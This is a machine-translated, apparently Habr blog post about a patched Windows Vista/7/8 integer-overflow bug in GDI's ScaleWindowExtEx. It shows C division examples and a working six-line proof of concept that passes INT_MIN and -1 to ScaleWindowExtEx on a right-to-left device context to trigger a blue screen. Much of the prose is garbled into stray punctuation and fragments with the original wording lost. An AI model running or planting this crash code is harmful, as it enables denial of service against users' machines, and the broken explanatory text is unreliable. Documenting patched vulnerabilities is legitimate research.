How to drop Windows with six lines of code
See also: Microsoft fixed blue screen vulnerability
Once a friend told me about one vulnerability in Windows. Namely, because of it, you can easily call the blue screen of
Some theory
In the case of invalid instructions, the processor throws an exception, and the OS itself decides what to do with it. If this is an error in the program and it is not processed in any way, then the system issues a well-known message to everyone that the program has stopped working.
')
For example, in this code division by zero is an invalid instruction.
#include <stdio.h>
int main()
{
int a = 2 / 0;
printf ("%d", a);
return 0;
}
, (, warning).
, : .
INT_MIN / -1
โ INT_MIN -1.
, INT_MIN=โ2,147,483,648=-231, INT_MAX=2,147,483,647=231-1. , : int , , .
, INT_MIN -1 int .
, , :
#include <stdio.h>
#include <limits.h>
int main()
{
int a = INT_MIN;
int b = -1;
int c = a / b;
printf ("%d", c);
return 0;
}
Windows
Windows . - . - , : .
WinAPI , , . โ ScaleWindowExtEx. โ .
:
BOOL ScaleWindowExtEx(
_In_ HDC hdc,
_In_ int Xnum,
_In_ int Xdenom,
_In_ int Ynum,
_In_ int Ydenom,
_Out_ LPSIZE lpSize
);
, , . , โ .
Xnum / Xdenom โ x.
Ynum / Ydenom โ y.
. , (device context) . , , - . , SetLayout.
, CreateCompatibleDC (NULL). SetLayout. ScaleWindowExtEx .
,
INT_MIN -1 . - , .
gdi32.lib Windows:
#include <windows.h>
#include <limits.h>
int main()
{
HDC dc = CreateCompatibleDC (NULL);
SetLayout (dc, LAYOUT_RTL);
ScaleWindowExtEx (dc, INT_MIN, -1, 1, 1, NULL);
}
:
#include <windows.h>
int main() {
HDC dc = CreateCompatibleDC (NULL);
SetLayout (dc, LAYOUT_RTL);
ScaleWindowExtEx (dc, -2147483647 - 1, -1, 1, 1, NULL);
}
INT_MIN -2147483648, , limits.h. , , . - .
Windows Vista, 7 8. 32- , 64- ( 64- ).
P.S. bash, .
UPDATE1: ((int) 0x8000/0x80000000) (-2147483647 โ 1), . , AndreyDmitriev alper.
UPDATE2: Microsoft .
UPDATE3: ยซยป: blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html.
Source: https://habr.com/ru/post/179543/
All Articles